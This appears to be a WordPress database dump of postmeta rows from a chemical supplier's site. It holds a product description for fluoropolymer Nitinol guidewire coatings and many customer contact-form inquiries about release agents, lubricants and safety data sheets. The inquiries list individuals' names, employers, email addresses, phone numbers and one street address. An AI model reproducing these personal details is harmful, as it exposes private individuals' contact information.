INSERT INTO `wp_postmeta` VALUES (37231, 4186, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (37232, 4186, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (37233, 4186, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (37234, 4186, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37235, 4186, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37236, 4186, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (37237, 4186, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (37238, 4186, '_ywtm_content_tab_description', '<h2><strong>Water-based, Nitinol Wire Coatings</strong></h2>\r\nMiller-Stephenson offers a low-temperature variant of their next generation, acid-primer free (Non-Cr(VI)) Medical Coating for coating of temperature sensitives substrates like Nickel-Titanium Alloys, PEEK, etc.  These Nitinol Wire Coatings are water-based, one coat systems providing the same robust and durable fluoropolymer coating in a lower cure temperature system.  Achieving the sample performance standards as our 850G-900X and 850G-1025, this product was designed for the new generation of low temperature metal alloys and/or high temperature plastics. Our world-class next generation fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires. Its lower hazardous classification and stability at ambient temperature also help with handling, application pot-life, and storage conditions. These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.   In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\r\n<ul>\r\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\r\n 	<li class="Body">Low Bake Cure temperatures (450 - 500 F)</li>\r\n 	<li class="Body">Unmatched Surface Adhesion</li>\r\n 	<li class="Body">Elimination of Delamination</li>\r\n 	<li class="Body">Full Back Intergrated raw material manufacturing; Guarantees 100% consistency lot-to-lot</li>\r\n 	<li class="Body">Substantial safer than Cr(VI) / Acid Primer systems</li>\r\n 	<li class="Body">Stable to all forms of sterilization</li>\r\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\r\n</ul>\r\n<p class="Body"><span class="C-8">Our next generation, acid primer-free, Nitinol Wire coatings are optimized to provide superior adhesion to temperature sensitive metallic alloys.  No other product on the market can match the adhesion characteristics and durability of our coating technology. 850G-1012 are <span style="text-decoration: underline;">Next-generation</span> Nitinol Wire Coatings by Chemours™ / Miller-Stephenson™ provides excellent adhesion and corrosion protection on a variety of substrates (Nickel-Titanium alloys and high temperature plastics) while maintaining an extremely low coefficient of friction (high lubricity). These nitinol wire coatings are the path forward for companies who want to stay ahead of the Regulatory restriction of Chromium-6 while enhancing consistency, surface adhesion, and miniizel coefficient of friction   </span></p>\r\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Being a one-coat system, our Nitinol wire coatings develops a  thin-film  on the surface of the substrate which stratifies the fluoropolymers to the surface during baking.\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE guidewire coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\r\n\r\n<h3><span style="text-decoration: underline; font-size: 75%;"><strong>Performance and Facts of Fluoropolymer Medical Coatings:</strong></span></h3>\r\n<ul>\r\n 	<li>No Cr(VI)</li>\r\n 	<li>Water-based</li>\r\n 	<li>One coat system</li>\r\n 	<li>Non-corrosive, non-flammable, low VOC</li>\r\n 	<li>One year shelf life stored at room temperature</li>\r\n 	<li>Comparable low coefficient of friction as PTFE- Cr(VI) based coating</li>\r\n 	<li>Dark Green or variety color as requested</li>\r\n 	<li>Coated Nitinol passed Adhesion test , ASTM-3359</li>\r\n 	<li>Coated Nitinol catheter guidewires passed flexibility / adhesion tests, ISO11070 Annex F wrapping test</li>\r\n 	<li>Coated Nitinol catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\r\n 	<li>Positive feedback from customer evaluations</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>'); 
INSERT INTO `wp_postmeta` VALUES (37239, 4186, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (37240, 4186, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (37241, 4186, '_yoast_wpseo_primary_product_cat', '523'); 
INSERT INTO `wp_postmeta` VALUES (37242, 4186, '_yoast_wpseo_focuskw_text_input', 'Nitinol Wire Coatings'); 
INSERT INTO `wp_postmeta` VALUES (37243, 4186, '_yoast_wpseo_focuskw', 'Nitinol Wire Coatings'); 
INSERT INTO `wp_postmeta` VALUES (37244, 4186, '_yoast_wpseo_title', 'Nitinol Wire Coatings | Low-Temp Fluoropolymer Coatings | MS Medical'); 
INSERT INTO `wp_postmeta` VALUES (37245, 4186, '_yoast_wpseo_metadesc', 'Miller-Stephenson offers a low-temperature cure Fluoropolymer systems specifically for Nitinol wire coatings and other temperature-sensitive substrates.'); 
INSERT INTO `wp_postmeta` VALUES (37246, 4186, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (37247, 4186, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (37248, 4186, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (37249, 4189, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37250, 4189, '_seq_num', '620'); 
INSERT INTO `wp_postmeta` VALUES (37251, 4189, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37252, 4189, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37253, 4189, '_field_1', 'silvia bezer'); 
INSERT INTO `wp_postmeta` VALUES (37254, 4189, '_field_10', 'ppg'); 
INSERT INTO `wp_postmeta` VALUES (37255, 4189, '_field_2', 'sbezer@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (37256, 4189, '_field_8', '(412) 721-4023'); 
INSERT INTO `wp_postmeta` VALUES (37257, 4189, '_field_3', 'can I get a sample of Heloxy 505?'); 
INSERT INTO `wp_postmeta` VALUES (37258, 4189, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37259, 4189, '_sub_id', '4189'); 
INSERT INTO `wp_postmeta` VALUES (37260, 4190, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37261, 4190, '_seq_num', '621'); 
INSERT INTO `wp_postmeta` VALUES (37262, 4190, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37263, 4190, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37264, 4190, '_field_1', 'David Villarreal'); 
INSERT INTO `wp_postmeta` VALUES (37265, 4190, '_field_10', 'Plasma Technology Inc.'); 
INSERT INTO `wp_postmeta` VALUES (37266, 4190, '_field_2', 'DAVE@PTISE.COM'); 
INSERT INTO `wp_postmeta` VALUES (37267, 4190, '_field_8', '(310) 320-3373'); 
INSERT INTO `wp_postmeta` VALUES (37268, 4190, '_field_3', 'Hello. I am looking for one gallon of MS-143DF PTFE Release Agent, Dry Lubricant. I could not locate on  your website. Let me know if this is still available, along with price &amp; lead time. Otherwise please provide alternative information. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (37269, 4190, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37270, 4190, '_sub_id', '4190'); 
INSERT INTO `wp_postmeta` VALUES (37271, 4191, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37272, 4191, '_seq_num', '622'); 
INSERT INTO `wp_postmeta` VALUES (37273, 4191, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37274, 4191, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37275, 4191, '_field_1', 'Arpita Garg'); 
INSERT INTO `wp_postmeta` VALUES (37276, 4191, '_field_10', 'Aeromarine World Inc.,'); 
INSERT INTO `wp_postmeta` VALUES (37277, 4191, '_field_2', 'sales@aeromarineworld.com'); 
INSERT INTO `wp_postmeta` VALUES (37278, 4191, '_field_8', '(408) 348-5265'); 
INSERT INTO `wp_postmeta` VALUES (37279, 4191, '_field_3', 'Hi,\r\nPlease let us know the pricing for MS143H --10 Pints/qts. \r\nAlso let us know the alternate quote in case the item is discontinued\r\nThanks,'); 
INSERT INTO `wp_postmeta` VALUES (37280, 4191, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37281, 4191, '_sub_id', '4191'); 
INSERT INTO `wp_postmeta` VALUES (37282, 4192, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37283, 4192, '_seq_num', '623'); 
INSERT INTO `wp_postmeta` VALUES (37284, 4192, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37285, 4192, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37286, 4192, '_field_1', 'Michael Nerino'); 
INSERT INTO `wp_postmeta` VALUES (37287, 4192, '_field_10', 'Northrop Grumman'); 
INSERT INTO `wp_postmeta` VALUES (37288, 4192, '_field_2', 'michael.nerino@ngc.com'); 
INSERT INTO `wp_postmeta` VALUES (37289, 4192, '_field_8', '(757) 423-6313'); 
INSERT INTO `wp_postmeta` VALUES (37290, 4192, '_field_3', 'We require the latest Safety Data Sheet (SDS) for MS-122AD PTFE Release Agent. \nThank you'); 
INSERT INTO `wp_postmeta` VALUES (37291, 4192, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37292, 4192, '_sub_id', '4192'); 
INSERT INTO `wp_postmeta` VALUES (37293, 4193, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37294, 4193, '_seq_num', '624'); 
INSERT INTO `wp_postmeta` VALUES (37295, 4193, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37296, 4193, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37297, 4193, '_field_1', 'Ryan Kiger'); 
INSERT INTO `wp_postmeta` VALUES (37298, 4193, '_field_10', 'Data Sciences Int&#039;l'); 
INSERT INTO `wp_postmeta` VALUES (37299, 4193, '_field_2', 'rkiger33@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (37300, 4193, '_field_8', '(651) 414-5424'); 
INSERT INTO `wp_postmeta` VALUES (37301, 4193, '_field_3', 'We received a 2 new gallons of Vertrel the other week and they aren&#039;t working properly for the application we use them in. We would like to get an RMA to send them back. '); 
INSERT INTO `wp_postmeta` VALUES (37302, 4193, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37303, 4193, '_sub_id', '4193'); 
INSERT INTO `wp_postmeta` VALUES (37304, 4194, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37305, 4194, '_seq_num', '625'); 
INSERT INTO `wp_postmeta` VALUES (37306, 4194, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37307, 4194, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37308, 4194, '_field_1', 'Jon Will'); 
INSERT INTO `wp_postmeta` VALUES (37309, 4194, '_field_10', 'Michigan Fastener'); 
INSERT INTO `wp_postmeta` VALUES (37310, 4194, '_field_2', 'michiganfastener@outlook.cm'); 
INSERT INTO `wp_postmeta` VALUES (37311, 4194, '_field_8', '(810) 728-4005'); 
INSERT INTO `wp_postmeta` VALUES (37312, 4194, '_field_3', 'Hello,\r\n\r\nMy name is Jon owner of Michigan Fastener. We are a wire nail making manufacturer. \r\n\r\nI am looking for a coating that is very thin with a varnish green or yellow tint. Most coated steel sinker nails are made with a vinyl type coating or cement type coating. \r\n\r\nWe are a new company looking for a anti rust resistant or a thin type of coating that has quick dry time. We dip our nails in a dipping drum that does not require heat (its a dip in pull out and dry). Do you have anything that will work? sold in 55 gal drums? \r\n\r\nIf you do not offer this product do you know who does?\r\n\r\nThank you,\r\n\r\n\r\nJon Will\r\nMichiganfastener@outlook.com\r\n810-728-4005\r\n \r\n'); 
INSERT INTO `wp_postmeta` VALUES (37313, 4194, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37314, 4194, '_sub_id', '4194'); 
INSERT INTO `wp_postmeta` VALUES (37315, 4195, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37316, 4195, '_seq_num', '626'); 
INSERT INTO `wp_postmeta` VALUES (37317, 4195, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37318, 4195, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37319, 4195, '_field_1', 'brian'); 
INSERT INTO `wp_postmeta` VALUES (37320, 4195, '_field_10', 'NYS DOT'); 
INSERT INTO `wp_postmeta` VALUES (37321, 4195, '_field_2', 'brian.cieslinski@dot.ny.gov'); 
INSERT INTO `wp_postmeta` VALUES (37322, 4195, '_field_8', '(585) 352-3471'); 
INSERT INTO `wp_postmeta` VALUES (37323, 4195, '_field_3', 'Good morning sirs:\n Looking for a quote please for your\nAsphalt release.5 gal buckets\n    Thank you      Brian Cieslinski\n                               NYS DOT\n                             2441 south Union st.\n                               Spencerport Ny 14559\n'); 
INSERT INTO `wp_postmeta` VALUES (37324, 4195, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37325, 4195, '_sub_id', '4195'); 
INSERT INTO `wp_postmeta` VALUES (37326, 4196, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37327, 4196, '_seq_num', '627'); 
INSERT INTO `wp_postmeta` VALUES (37328, 4196, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37329, 4196, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37330, 4196, '_field_1', 'BARB DONOHUE'); 
INSERT INTO `wp_postmeta` VALUES (37331, 4196, '_field_10', 'BELL HELICOPTER'); 
INSERT INTO `wp_postmeta` VALUES (37332, 4196, '_field_2', 'BDONOHUE@BH.COM'); 
INSERT INTO `wp_postmeta` VALUES (37333, 4196, '_field_8', '(613) 392-2811'); 
INSERT INTO `wp_postmeta` VALUES (37334, 4196, '_field_3', 'I AM LOOKING FOR A QUOTE FOR TWO PRODUCTS:\n555 OIL AND 2380 TURBO OIL. '); 
INSERT INTO `wp_postmeta` VALUES (37335, 4196, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37336, 4196, '_sub_id', '4196'); 
INSERT INTO `wp_postmeta` VALUES (37337, 4197, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37338, 4197, '_seq_num', '628'); 
INSERT INTO `wp_postmeta` VALUES (37339, 4197, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37340, 4197, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37341, 4197, '_field_1', 'Khosrow Maghsoudi'); 
INSERT INTO `wp_postmeta` VALUES (37342, 4197, '_field_10', 'UQAC'); 
INSERT INTO `wp_postmeta` VALUES (37343, 4197, '_field_2', 'khosrow.maghsoudi1@uqac.ca'); 
INSERT INTO `wp_postmeta` VALUES (37344, 4197, '_field_8', '(418) 545-5011'); 
INSERT INTO `wp_postmeta` VALUES (37345, 4197, '_field_3', 'Hello,\r\n\r\nI am a PhD student in UQAC.\r\nI&#039;m working on injection molding of rubber materials.\r\nWhich product of yours do you suggest as a proper release agent for my system?\r\n\r\nThanks in advance,\r\nBest regards,\r\n\r\nKhosrow Maghsoudi'); 
INSERT INTO `wp_postmeta` VALUES (37346, 4197, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37347, 4197, '_sub_id', '4197'); 
INSERT INTO `wp_postmeta` VALUES (37348, 4198, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37349, 4198, '_seq_num', '629'); 
INSERT INTO `wp_postmeta` VALUES (37350, 4198, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37351, 4198, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37352, 4198, '_field_1', 'Kathy Olsen '); 
INSERT INTO `wp_postmeta` VALUES (37353, 4198, '_field_10', 'Germfree Laboratories, Inc. '); 
INSERT INTO `wp_postmeta` VALUES (37354, 4198, '_field_2', 'kolsen@germfree.com'); 
INSERT INTO `wp_postmeta` VALUES (37355, 4198, '_field_8', '(386) 265-4312'); 
INSERT INTO `wp_postmeta` VALUES (37356, 4198, '_field_3', 'HI - we are interested in buying a small qty of the MS-555 Flux Remover.  Do you have a distributor we can buy it from?   We are located in Ormond Beach, FL.  Thanks. '); 
INSERT INTO `wp_postmeta` VALUES (37357, 4198, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37358, 4198, '_sub_id', '4198'); 
INSERT INTO `wp_postmeta` VALUES (37359, 4199, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37360, 4199, '_seq_num', '630'); 
INSERT INTO `wp_postmeta` VALUES (37361, 4199, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37362, 4199, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37363, 4199, '_field_1', 'Dale Armstrong'); 
INSERT INTO `wp_postmeta` VALUES (37364, 4199, '_field_10', 'The Boeing Company'); 
INSERT INTO `wp_postmeta` VALUES (37365, 4199, '_field_2', 'dale.w.armstrong@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (37366, 4199, '_field_8', '(425) 234-6406'); 
INSERT INTO `wp_postmeta` VALUES (37367, 4199, '_field_3', 'I am writing to request a Chinese language version of the SDS for Aero-Duster MS-222N. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (37368, 4199, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37369, 4199, '_sub_id', '4199'); 
INSERT INTO `wp_postmeta` VALUES (37370, 4200, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37371, 4200, '_seq_num', '631'); 
INSERT INTO `wp_postmeta` VALUES (37372, 4200, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37373, 4200, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37374, 4200, '_field_1', 'Ligia Hernandez'); 
INSERT INTO `wp_postmeta` VALUES (37375, 4200, '_field_10', 'WeChem'); 
INSERT INTO `wp_postmeta` VALUES (37376, 4200, '_field_2', 'lhernandez@wechem.com'); 
INSERT INTO `wp_postmeta` VALUES (37377, 4200, '_field_8', '(504) 733-1152'); 
INSERT INTO `wp_postmeta` VALUES (37378, 4200, '_field_3', 'Hello,\r\nI would like to speak to someone in sales that could give me pricing and some technical information on the liquid non-flammable degreaser blends'); 
INSERT INTO `wp_postmeta` VALUES (37379, 4200, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37380, 4200, '_sub_id', '4200'); 
INSERT INTO `wp_postmeta` VALUES (37381, 4201, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37382, 4201, '_seq_num', '632'); 
INSERT INTO `wp_postmeta` VALUES (37383, 4201, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37384, 4201, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37385, 4201, '_field_1', 'Rhonda Kraska'); 
INSERT INTO `wp_postmeta` VALUES (37386, 4201, '_field_10', 'Acme Cryogenics'); 
INSERT INTO `wp_postmeta` VALUES (37387, 4201, '_field_2', 'rhonda@midwestcryo.com'); 
INSERT INTO `wp_postmeta` VALUES (37388, 4201, '_field_8', '(507) 744-3990'); 
INSERT INTO `wp_postmeta` VALUES (37389, 4201, '_field_3', 'Good Afternoon,\r\nI was wondering if you could provide a quote for Krytox GPL-226 in the 2oz tube.\r\n\r\nThank you,'); 
INSERT INTO `wp_postmeta` VALUES (37390, 4201, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37391, 4201, '_sub_id', '4201'); 
INSERT INTO `wp_postmeta` VALUES (37392, 4202, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37393, 4202, '_seq_num', '633'); 
INSERT INTO `wp_postmeta` VALUES (37394, 4202, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37395, 4202, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37396, 4202, '_field_1', 'Wynne'); 
INSERT INTO `wp_postmeta` VALUES (37397, 4202, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (37398, 4202, '_field_2', 'wynne.wen@newayvalve.com'); 
INSERT INTO `wp_postmeta` VALUES (37399, 4202, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37400, 4202, '_field_3', 'RFQ\n\ndesc	qty\nDupont, GPL206	200KGS\nDoupont Grease, NRT8906	200KGS\n'); 
INSERT INTO `wp_postmeta` VALUES (37401, 4202, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37402, 4202, '_sub_id', '4202'); 
INSERT INTO `wp_postmeta` VALUES (37403, 4203, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37404, 4203, '_seq_num', '634'); 
INSERT INTO `wp_postmeta` VALUES (37405, 4203, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37406, 4203, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37407, 4203, '_field_1', 'Jeremy Duffey'); 
INSERT INTO `wp_postmeta` VALUES (37408, 4203, '_field_10', 'GKN Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (37409, 4203, '_field_2', 'jeremy.duffey@usa.gknaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (37410, 4203, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37411, 4203, '_field_3', 'I am trying to run some trials using a new silicone material made from the Dow Corning Xiameter 4130-J and they told me that they use a Miller-Stephenson Aerosol Teflon release agent.  I was wondering if you can help me with the determining what product they use and if you can help me get a sample so we can determine if this will meet my requirements.  Also can you forward me the TDS and MSDS for the material as well.'); 
INSERT INTO `wp_postmeta` VALUES (37412, 4203, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37413, 4203, '_sub_id', '4203'); 
INSERT INTO `wp_postmeta` VALUES (37414, 4204, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37415, 4204, '_seq_num', '287'); 
INSERT INTO `wp_postmeta` VALUES (37416, 4204, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37417, 4204, '_field_12', 'Ted Schmidt'); 
INSERT INTO `wp_postmeta` VALUES (37418, 4204, '_field_13', 'Medtronic Diabetes'); 
INSERT INTO `wp_postmeta` VALUES (37419, 4204, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37420, 4204, '_field_14', 'ted.a.schmidt@medtronic.com'); 
INSERT INTO `wp_postmeta` VALUES (37421, 4204, '_field_15', '(818) 576-5703'); 
INSERT INTO `wp_postmeta` VALUES (37422, 4204, '_field_16', 'My question is whether MS122-DF is still commercially available?  If now is there a replacement product available?  Also if MS122-DF was discontinued, why was it discontinued and approximate date of is withdrawal from the market?  If a replacement product was substituted what are the differences between the two release agents?'); 
INSERT INTO `wp_postmeta` VALUES (37423, 4204, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37424, 4204, '_sub_id', '4204'); 
INSERT INTO `wp_postmeta` VALUES (37425, 4205, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37426, 4205, '_seq_num', '635'); 
INSERT INTO `wp_postmeta` VALUES (37427, 4205, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37428, 4205, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37429, 4205, '_field_1', 'Nate'); 
INSERT INTO `wp_postmeta` VALUES (37430, 4205, '_field_10', 'Suzhou Taoyuan Chemical Material Ltd Corporation'); 
INSERT INTO `wp_postmeta` VALUES (37431, 4205, '_field_2', 'hewei0419@126.com'); 
INSERT INTO `wp_postmeta` VALUES (37432, 4205, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37433, 4205, '_field_3', 'Hello there. We are a chemical material company from China,and we are in urgent need for water based release agent used in PU car seat. \r\nIf your company have this kind of product,please touch me ASAP through email.\r\n\r\nThanks in advance.\r\nNate'); 
INSERT INTO `wp_postmeta` VALUES (37434, 4205, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37435, 4205, '_sub_id', '4205'); 
INSERT INTO `wp_postmeta` VALUES (37436, 4206, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37437, 4206, '_seq_num', '636'); 
INSERT INTO `wp_postmeta` VALUES (37438, 4206, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37439, 4206, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37440, 4206, '_field_1', 'Selim Gursan'); 
INSERT INTO `wp_postmeta` VALUES (37441, 4206, '_field_10', 'EMAIR Aviation Inc'); 
INSERT INTO `wp_postmeta` VALUES (37442, 4206, '_field_2', 'sgursan@emair.com.tr'); 
INSERT INTO `wp_postmeta` VALUES (37443, 4206, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37444, 4206, '_field_3', 'Please advise whether MS-122XD is a substitute/alternative product for MS-122AD. Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (37445, 4206, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37446, 4206, '_sub_id', '4206'); 
INSERT INTO `wp_postmeta` VALUES (37447, 4207, '_wp_attached_file', '2017/05/242L-AS-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (37448, 4208, '_wp_attached_file', '2017/05/242N-AS-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (37449, 4210, '_wp_attached_file', '2017/05/143TE-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (37450, 4212, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37451, 4212, '_seq_num', '637'); 
INSERT INTO `wp_postmeta` VALUES (37452, 4212, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37453, 4212, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37454, 4212, '_field_1', 'Stanley Myers'); 
INSERT INTO `wp_postmeta` VALUES (37455, 4212, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (37456, 4212, '_field_2', 'StanleyB.Myers@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37457, 4212, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (37458, 4212, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nStanley Myers\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (37459, 4212, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37460, 4212, '_sub_id', '4212'); 
INSERT INTO `wp_postmeta` VALUES (37461, 4213, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37462, 4213, '_seq_num', '638'); 
INSERT INTO `wp_postmeta` VALUES (37463, 4213, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37464, 4213, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37465, 4213, '_field_1', 'Nick Edwards'); 
INSERT INTO `wp_postmeta` VALUES (37466, 4213, '_field_10', 'Western Casework Corp.'); 
INSERT INTO `wp_postmeta` VALUES (37467, 4213, '_field_2', 'Nick@westerncasework.com'); 
INSERT INTO `wp_postmeta` VALUES (37468, 4213, '_field_8', '(702) 271-7350'); 
INSERT INTO `wp_postmeta` VALUES (37469, 4213, '_field_3', 'I am trying to track down some clear matte finish apoxy. If you have this product available can you give me a price? if not point me in the wright direction.'); 
